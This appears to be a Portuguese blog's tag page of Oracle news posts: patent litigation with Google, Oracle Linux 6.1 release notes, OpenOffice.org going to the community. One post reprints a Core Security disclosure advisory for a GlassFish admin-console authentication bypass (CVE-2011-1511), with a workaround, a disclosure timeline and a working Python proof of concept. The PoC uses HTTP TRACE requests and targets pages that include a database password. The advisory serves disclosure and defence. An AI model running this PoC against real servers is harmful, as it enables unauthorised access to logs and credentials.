Posts Tagged ‘oracle’

Mais patentes da Oracle consideradas inválidas na briga com o Android

Tuesday, July 5th, 2011

Segundo as notas oficiais do site: http://www.h-online.com/open/news/item/Another-problem-for-Oracle-s-patents-1273038.html

A Oracle não está com tanta força assim junto aos processos contra a Google, que para tristeza da Oracle foram, maior parte de brigas por causa de patentes foi bem minimizada recentemente, o que permitirá a Oracle recorrer, mas inicialmente já perderam e muito a força com que tinham começado o processo (menos patentes estão em vigor no atual processo).

Veja a nota completa:

Another problem for Oracle’s patents

Oracle Android The validity of another Oracle patent has become doubtful in the dispute with Google about the infringement of Java patents and copyrights on Android devices. The US Patent Office and Trademark Office (USPTO) has provisionally declared all 24 claims of patent number 6,125,447 as being invalid. The USPTO based its decision on a patent that had been used in another case. This patent was granted in 1994 – three years before Sun filed its Java patent application. The US patent office also considered two publications released in 1996 as evidence that Sun’s described method for protecting applications via “protection domains” was anticipated by “prior art.”

Oracle has taken Google to court over seven alleged Java patent infringements in the Android mobile operating system. The USPTO’s latest decision has temporarily invalidated five of them fully or in part. Oracle can still comment on the decision and may, if required, appeal against the patent invalidation.

Attorney Scott Daniels, who specialises in examining US patents, speculates that the USPTO’s decision may cause the lawsuit against Google to be postponed until all patents have been fully examined. This could also be in the interests of the presiding judge, who has already requestedPDF that the original claims be reduced to a limited number of patent claims. Oracle has demanded that Google pay $2.6 billion in damages.

Oracle Linux 6.1

Thursday, June 2nd, 2011

Lançado novo Oracle Linux 6.1. Para conferir as notas de lançamento:

 

[El-errata] Oracle Linux 6 .1

Errata Announcements for Oracle Linux el-errata at oss.oracle.com
Tue May 31 16:49:49 PDT 2011


Oracle is pleased to announce the general availability of Oracle Linux
6.1 for x86 (32 bit) and x86_64 (64 bit) architectures.

Oracle Linux 6.1 ships with two sets of kernel packages:

       * Unbreakable Enterprise Kernel [kernel-uek-2.6.32-100.34.1.el6uek]
             o Installed and booted by default
       * Red Hat compatible Kernel [kernel-2.6.32-131.0.15.el6]
             o Installed by default

**Oracle Linux 6.1 includes both a 32 bit and a 64 bit Unbreakable
Enterprise Kernel. By default, both the Unbreakable Enterprise Kernel
and the Red Hat Compatible Kernel are installed. Unbreakable Enterprise
kernel shipped in this update has following driver updates:

Network Drivers updates

    * Updated tg3 to version 3.113.
    * Updated bnx2 driver and firmware to version 2.1.6
    * Added support for bnx2fc (version 1.0.2)
    * Updated bnx2x to version 1.62.00-6
    * Updated cnic to version 2.2.14
    * Updated bnx2i to version 2.6.2.3
    * Updated be2net to version 2.103.298r
    * Updated e100 to version 3.5.24-k2
    * Updated e1000e to version 1.2.20-k2
    * Updated ixgbe to version 3.2.10-NAPI
    * Updated igb to version 3.0.6-k2
    * Updated cxgb3 to version 1.1.4-ko
    * Added Chelsio T4(cxgb4) support (version 1.3.0-k0)
    * Updated bna to version 2.3.2.3r.
    * Updated igbvf to version 1.0.8-k0
    * Updated ixgbevf to version 1.0.19-k0
    * Updated qlge to version v1.00.00.27.00.00-01
    * Updated vxge to version 2.0.9-20840-k
    * Added qlcnic version 5.0.15.2
    * Updated enic to version 2.1.1.13
    * Updated netxen_nic to version 4.0.75

SCSI Drivers updates

    * Updated cxgb3i to version 2.0.0
    * Added cxgb4i (version 0.9.1)
    * Updated lpfc to version 0:8.3.5.30.1p
    * Updated megaraid_sas to version 00.00.05.34-rc1
    * Updated mpt2sas to version 08.101.00.00
    * Updated mptsas to version 3.04.18
    * Updated ipr to version 2.5.1
    * Updated fnic to version 1.5.0.1
    * Updated be2iscsi to version 2.103.298.0
    * Updated bfa to version 2.3.2.3
    * Updated hpsa to version 2.0.2-3
    * Updated cciss to version 3.6.28-RH
    * Updated qla4xxx to version v5.02.12.00.32.01-c0
    * Updated qla2xxx driver to version v8.03.07.03.32.1-k
    * Added Intel SCU driver version 1.0

Infiniband

    * Added QLogic IB support
    * Updated nes to 1.5.0.0

For more information, please refer to the online release notes available at:

http://oss.oracle.com/ol6/docs

Software Accessibility

All packages are available on the Unbreakable Linux Network
(http://linux.oracle.com).

Installable binary and source ISO images are available on eDelivery
(http://edelivery.oracle.com/linux).

If ISO images are needed before they are available on eDelivery, please request these via a My Oracle Support service request.

Thank you.

Sincerely,

The Oracle Linux Team
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://oss.oracle.com/pipermail/el-errata/attachments/20110531/9ac1be38/attachment.html


More information about the El-errata mailing list

 

Para baixar somente com registro.
Lembrado que Oracle Linux é uma “ripagem” do Linux Red Hat.

BLOG: Oracle – Mais um bugfix para vossa excelência

Thursday, May 12th, 2011

No mundo hacking ninguém fica parado e abaixo segue mais um exploit para a plataforma Glassfish da Oracle sob plataforma Windows:

Oracle GlassFish Server Administration Console Authentication Bypass

1. Advisory Information
Title: Oracle GlassFish Server Administration Console Authentication Bypass
Advisory ID: CORE-2010-1118
Advisory URL: http://www.coresecurity.com/content/glassfish_admin_authentication_bypass
Date published: 2011-05-11
Date of last update: 2011-05-11
Vendors contacted: Oracle
Release mode: User release
2. Vulnerability Information
Class: Authentication Bypass Issues [CWE-592]
Impact: Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2011-1511
3. Vulnerability Description
Built using the GlassFish Server Open Source Edition, Oracle GlassFish Server delivers a flexible, lightweight and extensible Java EE 6 platform. It provides a small footprint, fully featured Java EE application server that is completely supported for commercial deployment and is available as a standalone offering.
The Administration Console of Oracle GlassFish Server, which is listening by default on port 4848/TCP, is prone to an authentication bypass vulnerability. This vulnerability can be exploited by remote attackers to access sensitive data on the server without being authenticated, by making TRACE requests against the Administration Console.
4. Vulnerable packages
Oracle GlassFish Server 3.0.1
Sun GlassFish Enterprise Server 2.1.1
5. Non-vulnerable packages
Oracle GlassFish Server 3.1
Contact Oracle for patches for other GlassFish versions
6. Vendor Information, Solutions and Workarounds
Oracle notifies that GlassFish Server 3.1 was released in March 2011 and was fixed before release, so it is not affected. Oracle also notifies that patches for previous versions will be available in July, 2011. As a policy, Oracle does not provide workarounds unless they can be easily applied by every customer.
6.1. Workaround by Core Security
For users who cannot upgrade to the latest patched version, the following workaround can be applied in order to avoid this flaw:
In the GlassFish Admin Console, go to the Tasks tree.
Navigate through: Network Config > Protocols > admin-listener > HTTP.
There is a checkbox "Trace: Enable TRACE operation" (checked by default); uncheck it and then save changes.
Finally, restart GlassFish by doing C:glassfishv3bin>asadmin restart-domain
After following these steps, when executing the PoC included in this advisory, the webserver should respond:
405 TRACE method is not allowed headers = [('date', 'Thu, 28 Apr 2011 20:39:43 GMT'), ('content-length', '0'), ('connection', 'close'), ('allow', 'GET, HEAD, POST'), ('x-powered-by', 'Servlet/3.0')] [+ full code]
7. Credits
This vulnerability was discovered and researched by Francisco Falcon from Core Security Technologies.
8. Technical Description / Proof of Concept Code
8.1. Introduction
Built using the GlassFish Server Open Source Edition, Oracle GlassFish Server [1] delivers a flexible, lightweight and extensible Java EE 6 platform. It provides a small footprint, fully featured Java EE application server that is completely supported for commercial deployment and is available as a standalone offering.
The Administration Console of Oracle GlassFish Server, which is listening by default on port 4848/TCP, is prone to an authentication bypass vulnerability. This vulnerability can be exploited by remote attackers to access sensitive data on the server without being authenticated, by making TRACE requests against the Administration Console.
8.2. Authentication Bypass
[CVE-2011-1511] By default, when GlassFish Server starts, it runs an HTTP listener named admin-listener, associated with the __asadmin virtual server. This administrative server, which is accessed by the Administration Console, has the HTTP TRACE verb enabled by default. This can be configured from the Network Config > Protocols > admin-listener > HTTP tab.
By performing HTTP requests against the GlassFish Administration Console using the TRACE method, a remote, unauthenticated attacker can get access to the content of restricted pages in the Administration Console, because GlassFish Server will behave as if it were handling GET requests from authenticated users.
It is important to note that the response of GlassFish Server to a TRACE request includes the full content of the requested resource in the response body, as in a GET request; according to RFC 2616 (Hypertext Transfer Protocol -- HTTP/1.1), section 9.8 [2], the response SHOULD reflect the original request to the client in the response body.
The vulnerability described above allows attackers to access the content of the following pages without being authenticated:
Log Viewer: http://<GlassFish_IP>:4848/common/logViewer/logViewer.jsf
Information about the Java Virtual Machine installed on the server: http://<GlassFish_IP>:4848/common/appServer/jvmReport.jsf
Installed components: http://<GlassFish_IP>:4848/updateCenter/installed.jsf
Properties of an existing JDBC connection pool, including DB password: http://<GlassFish_IP>:4848/jdbc/jdbcConnectionPoolProperty.jsf?name=DerbyPool
The following Python code is a Proof-of-Concept of the vulnerability; it will retrieve the content of the Log Viewer effectively bypassing the authentication:
#Usage: $ python poc.py <GlassFish_IP> <Administration_Port> #E.g: $ python poc.py 192.168.0.1 4848
import sys
import httplib
def make_trace_request(host, port, selector):
print '[*] TRACE request: %s' % selector
headers = { 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0;
Windows NT 5.1; Trident/4.0)',
'Host': '%s:%s' % (host, port),
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-us,en;q=0.5',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Accept-Encoding': 'gzip,deflate',
'Connection': 'close',
'Referer': 'http://%s:%s%s' % (host, port, selector)}
conn = httplib.HTTPConnection(host, port)
conn.request('TRACE', selector, headers=headers)
response = conn.getresponse()
conn.close()
print response.status, response.reason
print response.getheaders()
print response.read()
if len(sys.argv) != 3:
print "Usage: $ python poc.py <GlassFish_IP>
<GlassFish_Administration_Port>nE.g:   $ python poc.py 192.168.0.1 4848"
sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])
make_trace_request(host, port, '/common/logViewer/logViewer.jsf')
9. Report Timeline
2010-12-06: Initial notification sent to Oracle.
2010-12-07: Oracle replies that the bug has been forwarded to the product engineers, and requests Core to postpone the publication of the advisory.
2010-12-09: Core replies that the publication of the advisory can be postponed as long as Oracle provides a timeline for the release of fixes.
2010-12-20: Oracle confirms that it is a defect and it will be fixed in the development release. Oracle also replies that the fixes are planned to be released in April 2011.
2011-02-04: Core requests a status update on the fixes, and asks if Oracle can meet the April 2011 deadline.
2011-02-04: Oracle replies that the development version of GlassFish has already been fixed, and that the patches are being tested. They will update when all patches are tested and ready, still tracking an April 2011 release.
2011-02-17: Core informs that in that case the publication date will remain April 3rd.
2011-02-22: Oracle requests that the publication date is moved to April 19th, and informs that the patches are in progress and planned to be included in the upcoming Oracle's Critical Patch Update Security Advisory.
2011-02-24: Core replies acknowledging April 19th as the publication date.
2011-03-30: Core asks whether the GlassFish team is on track for an April 19th publication date.
2011-03-31: Oracle notifies that "patches would probably be ready to be released by April 19th. The bug affects multiple supported releases of the product with different fix schedules, and the GlassFish team is in various stages of the process."
2011-04-18: Core asks whether the GlassFish team is on track for an April 19th publication date.
2011-04-20: Oracle team notifies that in the previous email there was an unfortunate typo: when they wrote "It looks like patches would be ready to be released by April 19th", they meant "patches would not be ready... ". Oracle also requests to move the publication date to July 19th.
2011-04-25: Core notifies that this issue was reported on [2010-12-06] and (3 weeks ago [2011-03-31]) was confirmed to be released on Apr 19th. The typo Oracle mentioned changes the meaning of the last email altogether, while moving the release ahead for the end of July. Core communicates that no information was received about which specific versions of the software are vulnerable, and what are the specific workarounds or countermeasures that could be deployed in order to mitigate this vulnerability. Also, Core asks more details about Oracle's decision to postpone the release of fixes for 3 months. Specifically, Core wants to know if Oracle is intentionally delaying the release of patches to include them in the release of a new version of their product.
2011-04-25: Oracle notifies that:
This issue affects Sun GlassFish Enterprise Server 2.1.1 and Oracle GlassFish Server 3.0.1.
Oracle GlassFish Server 3.1 was released in March 2011 and was fixed before the release, so it is not affected.
The fix review, integration, test and release cycles run on predetermined schedules. Oracle is not delaying any fixes.
As a policy, Oracle does not provide workarounds unless they can be easily applied by every customer.
Fixes have been integrated; all the final patches should be available in July.
2011-05-05: Core decides to release the advisory next Wednesday, May 11th; and notifies the sequence of events that has motivated that decision:
Oracle was notified of the vulnerability 5 month ago.
Oracle released a fixed version of GlassFish (March 2011) without notifying Core, without patching previous versions and without publishing any workaround for affected users.
Core has a workaround that mitigates the vulnerability.
Core sends the proposed workaround [Sec. 6.1] to the Oracle Team and asks if they want to add further information in the advisory.
2011-05-06: Oracle requests Core to hold the advisory publication until they have patches available for all customers. Oracle states that they announce security fixes on a pre-determined schedule, so users are prepared to apply them. Adhoc publication of issues may not allow every customer to monitor and apply patches in time, which increases their exposure.
2011-05-09: Core notifies that the publication of security advisories is aimed at explaining the problem to the vulnerable user community and providing the technical details and guidance so they can devise protection countermeasures. Core usually releases this information in coordination with the vendor, but in this case this is not possible because Oracle has already released patches for some versions (without notifying Core). Currently, there is a patched version of GlassFish and there are vulnerable versions with exposed users. In this scenario, Core has decided to release the advisory as 'user 'release' next Wednesday, providing a way to mitigate the problem until patches are available. The vendor (Oracle in this case) may or may not agree with Core assessment on how to help users to reduce risk, but the vendor is certainly not the only party entitled to provide plausible solutions to the problem.
2011-05-11: Advisory CORE-2010-1118 is published.
10. References
[1] http://www.oracle.com/us/products/middleware/application-server/oracle-glassfish-server/index.html
[2] http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html
11. About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
12. About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and prove real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
13. Disclaimer
The contents of this advisory are copyright (c) 2011 Core Security Technologies and (c) 2011 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

 

 

FONTE: http://www.exploit-db.com/exploits/17276/

Oracle libera OpenOffice para a Comunidade

Sunday, April 17th, 2011

Oracle Announces Its Intention to Move OpenOffice.org to a Community-Based Project

REDWOOD SHORES, CA–(Marketwire – April 15, 2011) – Oracle Corporation (NASDAQ: ORCL) today is announcing its intention to move OpenOffice.org to a purely community-based open source project and to no longer offer a commercial version of Open Office.”Given the breadth of interest in free personal productivity applications and the rapid evolution of personal computing technologies, we believe the OpenOffice.org project would be best managed by an organization focused on serving that broad constituency on a non-commercial basis,” said Edward Screven, Oracle’s Chief Corporate Architect. “We intend to begin working immediately with community members to further the continued success of Open Office. Oracle will continue to strongly support the adoption of open standards-based document formats, such as the Open Document Format (ODF).”Oracle has a long history of investing in the development and support of open source products. We will continue to make large investments in open source technologies that are strategic to our customers including Linux and MySQL. Oracle is focused on Linux and MySQL because both of these products have won broad based adoption among commercial and government customers.

Galera, estou muito FELIZ e agora acredito plenamente que esse projeto decole, até porque o que a Oracle queria com a compra da Sun além de acabar com o MySQL era acabar com tudo que veio junto com a compra da Sun(com algumas resalvas, diga-se JAVA),  pra mim o ponta pé inicial foi descontinuar o Open Solaris, depois vem a questão de o projeto MySQL estar “parado” no tempo… até porque quem seria “doido”de desenvolver uma ferramenta que é umas das principais concorrentes do seu principal produto e ainda com o diferencial de ser GRATUITO,  e por ai vai….. Realmente muda-se a visão sobre o projeto… com certeza a comunidade é o gestor mais indicado para gerir um projeto tão grandioso.

Abraço a todos.:D

Fonte

Para tristeza do meu coração: Apache será vendida

Thursday, April 1st, 2010


Senhores, para minha total tristeza a Apache será vendida.
O que será dos amantes deste projeto?

vide:

http://blogs.apache.org/foundation/date/20100401